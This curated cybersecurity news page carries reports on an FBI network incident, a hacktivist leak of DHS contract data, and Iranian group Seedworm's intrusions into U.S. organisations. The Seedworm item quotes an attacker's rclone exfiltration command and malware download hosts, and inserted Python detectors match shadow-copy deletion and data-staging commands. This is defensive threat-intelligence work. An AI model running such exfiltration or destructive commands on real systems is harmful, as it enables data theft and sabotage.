Cyberveille, curated by Decio
FBI targeted with ‘suspicious’ activity on its networks | CyberScoop https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/
08/03/2026 11:55:07

cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities among budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.

cyberscoop.com EN 2026 FBI US Malicious suspicious activity
Hacktivists claim to have hacked Homeland Security to release ICE contract data https://techcrunch.com/2026/03/02/hacktivists-claim-to-have-hacked-homeland-security-to-release-ice-contract-data/
08/03/2026 11:52:34

TechCrunch (techcrunch.com)
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivist said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solution, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

techcrunch.com EN 2026 hacked Hacktivists US ICE Department-of-Peace Homeland-Security
Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
08/03/2026 11:47:52

security.com
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, and the same backdoor was seen on the networks of a U.S. bank and the Canadian non-profit organization. Dindoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute, and was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely that Iran and its allies will also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney, the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran, using a Gmail address and a misspelled version of her name, “Suzzane Maloney”. In the attacks, the actors started out with a benign email, which eventually led to a subsequent email containing a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage, more specifically to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from NordVPN infrastructure against Israeli municipal government entities was reported, followed by spear-phishing attacks containing links to a ClickFix page designed to trick users into executing malicious PowerShell and ultimately deliver a remote access tool (RAT) through which the attackers could execute arbitrary commands. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli entities points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

The group leveraged high-volume DDoS attacks, reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN flood and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely be focused on energy and utilities, transportation and logistics, the financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by strengthening their monitoring capabilities and ensuring resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often give defenders an opportunity to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and should monitor any internet-facing infrastructure for the following:

  • Spikes in HTTP requests from large, distributed IP ranges
  • Repeated probing of admin portals
  • Exploit attempts targeting web frameworks and content management systems
  • Scanning activity against exposed API endpoints

To prepare, organizations should consider the following:

  • Deploy web application firewalls (WAF) with updated rule sets
  • Enable DDoS protection via CDN or upstream filtering services
  • Decommission any non-essential or unused publicly accessible services
  • Apply patches for web applications and plugins promptly and regularly
  • Ensure website backups exist for rapid restoration, if required
  • Monitor underground forums, Telegram channels and social media for claims involving your organization

Credential attacks
Credential attacks, including attempts against multiple public-facing services, are one of the most common initial access techniques used by Iranian-linked groups.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts and related credential abuse, such as the following:

  • Repeated login failures across multiple users
  • Authentication attempts from unusual geographic locations
  • MFA fatigue attacks
  • Login attempts occurring outside of normal working hours
  • Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
  • Deployment of web shells on internet-facing servers
  • Credential harvesting through phishing campaigns

Organizations should review and harden their identity security mechanisms by performing the following:

  • Enable multi-factor authentication for all remote access
  • Disable legacy authentication protocols
  • Implement conditional access policies based on location and device risk
  • Restrict admin logins to specific locations, where possible
  • Monitor identity provider logs for any anomalies

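Detection logic for the password-spraying patterns listed above, as an added example that is not part of the original article. It parses a constructed authentication log (the log format, IP addresses and usernames are assumptions) and flags a source that fails against many distinct accounts within a short window, which separates a spray from one user mistyping their own password. Each finding also records whether the burst fell outside working hours and whether any account subsequently authenticated successfully from the same source, since a spray that lands is the case that needs immediate response.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (format and all values are assumptions for this example):
# <UTC timestamp> <source IP> <username> <SUCCESS|FAILURE>
# 203.0.113.7 fails once each against five accounts at 02:14 UTC and then
# succeeds against a sixth; 198.51.100.20 is one user fumbling their own password.
SAMPLE_AUTH_LOG = """\
2026-03-02T02:14:03Z 203.0.113.7 alice FAILURE
2026-03-02T02:14:09Z 203.0.113.7 bob FAILURE
2026-03-02T02:14:15Z 203.0.113.7 carol FAILURE
2026-03-02T02:14:21Z 203.0.113.7 dave FAILURE
2026-03-02T02:14:27Z 203.0.113.7 erin FAILURE
2026-03-02T02:14:33Z 203.0.113.7 frank SUCCESS
2026-03-02T09:30:00Z 198.51.100.20 alice FAILURE
2026-03-02T09:30:08Z 198.51.100.20 alice FAILURE
2026-03-02T09:30:20Z 198.51.100.20 alice SUCCESS
"""


def parse_auth_log(text):
    """Parse log lines into (timestamp, source_ip, username, outcome) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome))
    return sorted(events)


def detect_password_spray(events, window=timedelta(minutes=30), min_users=5, work_hours=(8, 18)):
    """Flag each source IP that fails against at least `min_users` distinct accounts
    within `window`.  The count is of distinct usernames, not of attempts, so a
    single user failing repeatedly does not trigger."""
    failures_by_ip = defaultdict(list)
    for ts, ip, user, outcome in events:
        if outcome == "FAILURE":
            failures_by_ip[ip].append((ts, user))

    findings = []
    for ip, fails in failures_by_ip.items():
        for i, (start, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) < min_users:
                continue
            end = start + window
            # Accounts that authenticated successfully from the same source during the burst.
            successes = sorted({u for t, src, u, o in events
                                if src == ip and o == "SUCCESS" and start <= t <= end})
            findings.append({
                "source_ip": ip,
                "window_start": start.isoformat(),
                "distinct_users": len(users),
                "off_hours": not (work_hours[0] <= start.hour < work_hours[1]),
                "successes": successes,
            })
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for finding in detect_password_spray(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(finding)
```

The thresholds are deliberately parameters: an identity provider serving thousands of users will need a higher `min_users` and a geo or ASN enrichment step on `source_ip` before the "unusual location" item on the list above can be checked; the structure of the sliding window stays the same.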
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

  • Unusual downloads from email systems
  • Unusual access to document repositories
  • Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving the collection of multiple file types
  • Large outbound data transfers to external cloud storage platforms
  • Unexpected use of data-transfer applications (e.g. Rclone) in the environment

Organizations should focus on the following controls:

  • Monitor for large outbound data transfers
  • Implement data loss prevention (DLP) policies
  • Restrict access to external cloud storage platforms
  • Enable auditing of email and file access

Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.
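The staging and exfiltration indicators above (archive creation collecting several sources, Rclone pointed at a cloud remote, large egress to object storage) as detection logic, as an added example that is not part of the original article. The process-creation events and egress summaries are constructed; host names, users, paths, the bucket name and the list of storage domains are assumptions. Each indicator on its own is noisy, so the last step correlates them per host: the Rclone-to-Wasabi attempt described earlier in the article is exactly the combination of a transfer tool launch plus a large outbound flow from the same machine.

```python
import re
from collections import defaultdict

# Hostname suffixes of public object-storage services (assumed list for this example).
CLOUD_STORAGE_SUFFIXES = ("backblazeb2.com", "wasabisys.com", "amazonaws.com", "storage.googleapis.com")
TRANSFER_TOOLS = {"rclone.exe", "rclone"}
ARCHIVE_TOOLS = {"7z.exe", "rar.exe", "winrar.exe"}
# rclone remotes look like "name:path"; requiring a 2+ character name skips Windows drive letters ("D:\").
REMOTE_RE = re.compile(r"(?<![\w\\])([A-Za-z][\w-]+):(\S*)")

# Constructed process-creation events (all values are assumptions), modelled on what an
# EDR or Sysmon event 1 records: image path and full command line.
PROCESS_EVENTS = [
    {"host": "WS-114", "user": "jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir D:\backups"},
    {"host": "WS-114", "user": "jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy D:\backups wasabi:constructed-bucket"},
    {"host": "SRV-02", "user": "svc_backup", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -r C:\staging\collect.7z C:\Shares\Finance C:\Shares\HR"},
    {"host": "WS-007", "user": "asmith", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"WINWORD.EXE /n"},
]

# Constructed egress summaries: bytes sent per host and destination over the period.
EGRESS_FLOWS = [
    {"host": "SRV-02", "dest": "s3.us-east-005.backblazeb2.com", "bytes_out": 4_800_000_000},
    {"host": "WS-007", "dest": "update.example-vendor.test", "bytes_out": 12_000_000},
    {"host": "WS-114", "dest": "s3.wasabisys.com", "bytes_out": 950_000_000},
]


def _basename(path):
    """Executable name from a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_transfer_tool(events):
    """Data-transfer tool launched with a cloud remote on its command line."""
    findings = []
    for ev in events:
        if _basename(ev["image"]) in TRANSFER_TOOLS:
            remotes = [m.group(0) for m in REMOTE_RE.finditer(ev["cmdline"])]
            findings.append({"host": ev["host"], "user": ev["user"],
                             "indicator": "transfer_tool", "remotes": remotes})
    return findings


def flag_archive_staging(events, min_sources=2):
    """Archiver adding several source paths into one archive: collection before exfiltration."""
    findings = []
    for ev in events:
        if _basename(ev["image"]) not in ARCHIVE_TOOLS:
            continue
        tokens = ev["cmdline"].split()
        if "a" not in tokens:  # 7-Zip / RAR "add to archive" verb
            continue
        paths = [t for t in tokens[tokens.index("a") + 1:] if "\\" in t]
        if len(paths) >= min_sources + 1:  # the archive itself plus the sources
            findings.append({"host": ev["host"], "user": ev["user"], "indicator": "archive_staging",
                             "archive": paths[0], "sources": paths[1:]})
    return findings


def flag_large_egress(flows, threshold_bytes=500_000_000):
    """Large volume sent to a public object-storage service."""
    return [{"host": f["host"], "indicator": "large_egress", "dest": f["dest"], "bytes_out": f["bytes_out"]}
            for f in flows if f["bytes_out"] >= threshold_bytes and f["dest"].endswith(CLOUD_STORAGE_SUFFIXES)]


def hosts_with_multiple_indicators(findings):
    """Hosts where at least two different indicator types coincide."""
    kinds = defaultdict(set)
    for f in findings:
        kinds[f["host"]].add(f["indicator"])
    return sorted(h for h, k in kinds.items() if len(k) >= 2)


def run(events=PROCESS_EVENTS, flows=EGRESS_FLOWS):
    findings = flag_transfer_tool(events) + flag_archive_staging(events) + flag_large_egress(flows)
    return findings, hosts_with_multiple_indicators(findings)


if __name__ == "__main__":
    all_findings, hosts = run()
    for f in all_findings:
        print(f)
    print("hosts with multiple indicators:", hosts)
```

In a real environment the egress threshold should be set relative to each host's baseline rather than as a fixed number, and the storage-domain list is best sourced from the proxy or firewall category feed; the per-host correlation is what keeps a backup server's legitimate upload from paging anyone while a workstation that both launched Rclone and pushed a gigabyte to a bucket does.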

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

  • Operational Technology (OT) interfaces
  • Scheduling and logistics systems
  • Contractor networks
  • Remote management systems

Security teams should ensure adequate monitoring is in place for:

  • Abnormal access to industrial control systems (ICS)
  • Unexpected remote connections to operational networks
  • Authentication attempts targeting infrastructure management systems
  • Unusual configuration changes in critical systems
  • Vendor access and contractor networks

Organizations faced with these attacks should, at a minimum, ensure:

  • Network segmentation across operational technology networks
  • Restricted remote access to infrastructure systems
  • Monitoring of contractor VPN access
  • Offline backups of critical configuration systems

Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should monitor for indicators that attackers may be preparing a destructive operation, such as:

  • Mass scheduled task creation
  • Attempts to disable security applications
  • Deletion of shadow copies or backup data
  • Unusual administrative commands executed across multiple hosts

Organizations should prioritize resilience against destructive attacks by:

  • Isolating backup infrastructure from production networks
  • Enabling immutable backups
  • Testing disaster recovery procedures regularly

Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.
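Three of the pre-destruction indicators above (mass scheduled-task creation, shadow copy deletion, and the same administrative command running across many hosts) as detection logic over process-creation records, as an added example that is not part of the original article. The records are constructed: host names, timestamps, the task name and the paths are assumptions. The fan-out check is the most general of the three, because it needs no signature at all: it only asks how many distinct hosts ran an identical command line inside a short window, which is what a wiper deployment through any remote-execution tool looks like on the endpoint.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in commands that remove the recovery data a wiper operator wants gone (MITRE ATT&CK T1490).
SHADOW_DELETE_RE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|wbadmin(\.exe)?\s+delete\s+catalog",
    re.IGNORECASE)
TASK_CREATE_RE = re.compile(r"schtasks(\.exe)?\s+/create", re.IGNORECASE)

# Constructed process-creation records (timestamp, host, command line); all values are assumptions.
# Eight hosts receive the same scheduled task within 35 seconds at 03:00 UTC, one of them then
# deletes its shadow copies; a single helpdesk task at noon is the benign control case.
SAMPLE_ROWS = [
    (f"2026-03-02T03:00:{5 * i:02d}Z", f"H{i + 1:02d}",
     r"schtasks /create /tn maint /tr C:\Temp\maint.bat /sc once /st 03:30")
    for i in range(8)
] + [
    ("2026-03-02T03:05:10Z", "H03", "vssadmin delete shadows /all /quiet"),
    ("2026-03-02T12:00:00Z", "H09",
     r"schtasks /create /tn helpdesk-cleanup /tr C:\Tools\cleanup.bat /sc daily /st 18:00"),
]


def parse_events(rows):
    """(timestamp, host, cmdline) tuples sorted oldest first."""
    return sorted((datetime.strptime(t, "%Y-%m-%dT%H:%M:%SZ"), h, c) for t, h, c in rows)


def flag_shadow_copy_deletion(events):
    """Signature match: any host deleting shadow copies or the backup catalog."""
    return [{"indicator": "shadow_copy_deletion", "host": h, "time": t.isoformat(), "cmdline": c}
            for t, h, c in events if SHADOW_DELETE_RE.search(c)]


def flag_task_creation_burst(events, window=timedelta(minutes=10), min_tasks=5):
    """Volume match: at least `min_tasks` scheduled tasks created fleet-wide inside `window`."""
    creates = [(t, h) for t, h, c in events if TASK_CREATE_RE.search(c)]
    for i, (start, _) in enumerate(creates):
        in_window = [(t, h) for t, h in creates[i:] if t - start <= window]
        if len(in_window) >= min_tasks:
            return {"indicator": "task_creation_burst", "window_start": start.isoformat(),
                    "count": len(in_window), "hosts": sorted({h for _, h in in_window})}
    return None


def flag_command_fanout(events, window=timedelta(minutes=10), min_hosts=5):
    """Signature-free match: one normalized command line seen on `min_hosts` distinct hosts inside `window`."""
    runs_by_cmd = defaultdict(list)
    for t, h, c in events:
        runs_by_cmd[" ".join(c.lower().split())].append((t, h))
    findings = []
    for cmd, runs in runs_by_cmd.items():
        for i, (start, _) in enumerate(runs):
            hosts = {h for t, h in runs[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                findings.append({"indicator": "command_fanout", "cmdline": cmd,
                                 "window_start": start.isoformat(), "hosts": sorted(hosts)})
                break
    return findings


def run(rows=SAMPLE_ROWS):
    events = parse_events(rows)
    findings = flag_shadow_copy_deletion(events) + flag_command_fanout(events)
    burst = flag_task_creation_burst(events)
    if burst:
        findings.append(burst)
    return findings


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

The fan-out rule will also fire on legitimate software deployment and patching, so an allow-list keyed on the deploying account or the management tool's parent process is needed in production; the point of pairing it with the shadow-copy signature is that the combination, on the same hosts in the same window, is what should trigger the isolation of backup infrastructure recommended above.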

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

